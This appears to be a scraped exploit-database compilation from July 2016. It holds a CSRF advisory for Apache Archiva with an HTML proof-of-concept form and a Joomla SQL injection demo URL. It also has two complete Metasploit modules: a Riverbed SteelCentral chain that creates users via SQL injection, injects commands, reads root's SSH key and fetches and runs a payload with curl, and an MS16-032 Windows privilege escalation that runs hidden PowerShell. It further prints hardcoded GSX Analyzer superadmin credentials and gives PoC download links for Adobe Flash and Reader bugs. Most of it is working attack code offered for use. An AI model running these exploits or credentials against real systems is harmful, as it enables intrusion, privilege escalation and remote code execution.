RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Apache Archiva
Vendor URL: https://archiva.apache.org
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2016-05-31
Date published: 2016-07-11
CVSSv3 Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
CVE: CVE-2016-4469
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Apache Archiva v1.3.9
older versions may be affected too.
4. INTRODUCTION
===============
Apache Archiva™ is an extensible repository management software that helps
taking care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application basically offers a Cross-Site Request Forgery protection
using the a Struts-based token called "token". While many administrative
functionalities like adding new users are protected on this way, the
following HTTP POST-based functions are missing this token and are
therefore vulnerable to CSRF:
Adding new repository proxy connectors:
/archiva/admin/addProxyConnector_commit.action
Adding new repositories:
/archiva/admin/addRepository_commit.action
Editing existing repositories:
/archiva/admin/editRepository_commit.action
Adding legacy artifact paths:
/archiva/admin/addLegacyArtifactPath_commit.action
Changing the organizational appearance:
/archiva/admin/saveAppearance.action
Uploading new artifacts:
/archiva/upload_submit.action
The following Proof-of-Concept triggers this vulnerability and adds a new
proxy connector called "CSRF":
<html>
<body>
<form
action="http://localhost:8080/archiva/admin/addProxyConnector_commit.action"
method="POST">
<input type="hidden" name="pattern" value="" />
<input type="hidden" name="connector.order" value="0" />
<input type="hidden" name="connector.proxyId"
value="(direct connection)" />
<input type="hidden" name="connector.sourceRepoId" value="CSRF" />
<input type="hidden" name="connector.targetRepoId"
value="maven2-repository.dev.java.net" />
<input type="hidden"
name="connector.policies['propagate-errors-on-update']"
value="always" />
<input type="hidden"
name="connector.policies['cache-failures']"
value="no" />
<input type="hidden"
name="connector.policies['releases']"
value="always" />
<input type="hidden"
name="connector.policies['propagate-errors']"
value="stop" />
<input type="hidden"
name="connector.policies['checksum']" value="fail" />
<input type="hidden"
name="connector.policies['snapshots']"
value="always" />
<input type="hidden" name="propertyKey" value="" />
<input type="hidden" name="propertyValue" value="" />
<input type="hidden" name="blackListPattern" value="" />
<input type="hidden" name="whiteListPattern" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability a user with administrative rights
must be tricked into visiting an arbitrary website while having an
authenticated session in the application.
The vulnerability allows remote attackers to perform sensitive
administrative actions like adding new repository proxy connectors, adding
new repositories, editing existing repositories, adding legacy artifact
paths, changing the organizational appearance or uploading new artifacts in
the authentication context of the targeted user.
7. SOLUTION
===========
Upgrade/Migrate to Apache Archiva 2.2.1
8. REPORT TIMELINE
==================
2016-05-31: Discovery of the vulnerability
2016-05-31: Notified vendor via public security mail address
2016-06-06: No response, sent out another notification
2016-06-10: Vendor states that this version is out of support
2016-06-21: Vendor assigns CVE-2016-4469
2016-07-11: Advisory released
9. REFERENCES
=============
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4469
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863108779
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Joomla Guru Pro (com_guru) Component - SQL Injection
# Exploit Author: s0nk3y
# Date: 14/07/2016
# Vendor Homepage: https://www.ijoomla.com
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
# Category: webapps
# Version: All
# Tested on: Ubuntu 16.04
1. Description
Turn your knowledge into dollars! Sell Your Courses Today!
Guru, allows you to create online courses easily! We believe that everyone is an expert in something. If you know something that others don't, there is no better time to profit from it. You can create a course about your topic and start generating income.
2. Proof of Concept
Itemid Parameter Vulnerable To SQL Injection
com_guru&view=gurupcategs&layout=view&Itemid=[SQL Injection]&lang=en
Demo :
http://server/index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123%27&lang=en
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
require 'digest'
def initialize(info={})
super(update_info(info,
'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
'Description' => %q{
This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
can be exploited to add a malicious user into the application's database. An attacker can then exploit a
command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
configuration of the sudoers file can be abused to escalate privileges to root.
},
'License' => MSF_LICENSE,
'Author' => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => "Jun 27 2016",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";
# Verifies existence of login SQLi
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_check
})
if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Attempting log in to target appliance")
@sessid = do_login
print_status("Confirming command injection vulnerability")
test_cmd_inject
vprint_status('Ready to execute payload on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def get_nonce
# Function to get nonce from login page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php'),
})
if res && res.body && res.body.include?('nonce_')
html = res.get_html_document
nonce_field = html.at('input[@name="nonce"]')
nonce = nonce_field.attributes["value"]
else
fail_with(Failure::Unknown, 'Unable to get login nonce.')
end
# needed as login nonce is bounded to preauth SESSID cookie
sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
return [nonce, sessid_cookie_preauth]
end
def do_login
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
# Exploit login SQLi if credentials are not valid.
if res && res.body && res.body.include?('<form name="login"')
print_status("Invalid credentials. Creating malicious user through login SQLi")
create_user
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
else
print_status("Valid login credentials provided. Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
end
return sessid_cookie
end
def report_cred(username, password)
# Function used to save login credentials into Metasploit database
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def create_user
# Function exploiting login SQLi to create a malicious user
username = datastore['RIVERBED_USER']
password = datastore['RIVERBED_PASSWORD']
usr_payload = generate_sqli_payload(username)
pwd_hash = Digest::SHA512.hexdigest(password)
pass_payload = generate_sqli_payload(pwd_hash)
uid = rand(999)
json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_sqli
})
json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_checkuser
})
if res && res.body && res.body.include?('session_id')
print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
end
def generate_sqli_payload(input)
# Function to generate sqli payload for user/pass in expected format
payload = ''
input_array = input.strip.split('')
for index in 0..input_array.length-1
payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
end
# Gets rid of the trailing '||' and newline
payload = payload[0..-3]
return payload
end
def test_cmd_inject
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
unless res && res.body.include?('uid=')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
end
def cmd_inject(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => cmd
})
end
# Deliver payload to appliance and make it run it
def primer
# Gets the autogenerated uri
payload_uri = get_uri
root_ssh_key_private = rand_text_alpha_lower(8)
binary_payload = rand_text_alpha_lower(8)
print_status("Privilege escalate to root and execute payload")
privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"
cmd_inject(privesc_exec_cmd)
register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
register_file_for_cleanup("/tmp/#{binary_payload}")
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation',
'Description' => %q{
This module exploits the lack of sanitization of standard handles in Windows' Secondary
Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
32 and 64 bit. This module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
},
'License' => BSD_LICENSE,
'Author' =>
[
'James Forshaw', # twitter.com/tiraniddo
'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
'khr0x40sh'
],
'References' =>
[
[ 'MS', 'MS16-032'],
[ 'CVE', '2016-0099'],
[ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
[ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 30,
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Mar 21 2016',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
# Tested on (32 bits):
# * Windows 7 SP1
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 8
# * Windows 2012
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0
))
register_advanced_options(
[
OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]),
# How long until we DELETE file, we have a race condition here, so anything less than 60
# seconds might break
OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
], self.class)
end
def get_arch
arch = nil
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
arch
end
def check
os = sysinfo["OS"]
if os !~ /win/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
arch1 = get_arch
if check == Exploit::CheckCode::Safe
print_error("Target is not Windows")
return
elsif arch1 == nil
print_error("Architecture could not be determined.")
return
end
# Exploit PoC from 'b33f'
ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
vprint_status("PS1 loaded from #{ps_path}")
ms16_032 = File.read(ps_path)
cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
# payload formatted to fit dropped text file
payl = cmd_psh_payload(payload.encoded,payload.arch,{
encode_final_payload: false,
remove_comspec: true,
method: 'old'
})
payl.sub!(/.*?(?=New-Object IO)/im, "")
payl = payl.split("';$s.")[0]
payl.gsub!("''","'")
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
path = datastore['W_PATH'] || pwd
@upfile = "#{path}\\#{@upfile}"
fd = session.fs.file.new(@upfile,"wb")
print_status("Writing payload file, #{@upfile}...")
fd.write(payl)
fd.close
psh_cmd = "IEX `$(gc #{@upfile})"
#lpAppName
ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
#lpcommandLine - capped at 1024b
ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
print_status('Compressing script contents...')
ms16_032_c = compress_script(ms16_032)
if ms16_032_c.size > 8100
print_error("Compressed size: #{ms16_032_c.size}")
error_msg = "Compressed size may cause command to exceed "
error_msg += "cmd.exe's 8kB character limit."
print_error(error_msg)
else
print_good("Compressed size: #{ms16_032_c.size}")
end
if datastore['DRY_RUN']
print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
return
end
print_status("Executing exploit script...")
cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
args = nil
begin
process = session.sys.process.execute(cmd, args, {
'Hidden' => true,
'Channelized' => false
})
rescue
print_error("An error occurred executing the script.")
end
end
def cleanup
sleep_t = datastore['TIMEOUT']
vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
sleep sleep_t
begin
rm_f(@upfile)
print_good("Cleaned up #{@upfile}")
rescue
print_error("There was an issue with cleanup of the powershell payload script.")
end
end
end
# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
# Date: 12-07-16
# Exploit Author: ndevnull
# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
# Software Link: http://www.gsx.com/download-the-trial-ma
# Version: 10.12, but also found in version 11
# Tested on: Windows Server 2008
# CERT : VR-241
# CVE :
1. Description
After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor.
The found credentials are:
Username: gsxlogin
Password: gsxpassword
2. Proof of Concept
A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability.
Code snippet:
-----------------
if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
-----------------
3. Solution:
Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4177
# COSIG-2016-21
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘SceneAndFrameData’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40104.zip
###############################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4176
# COSIG-2016-20
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘TAG’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40105.zip
###############################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘DefineSprite’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40103.zip
####################################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40102.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4201
# COSIG-2016-24
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40101.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4206
# COSIG-2016-25
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40100.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4208
# COSIG-2016-27
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40098.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4207
# COSIG-2016-26
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
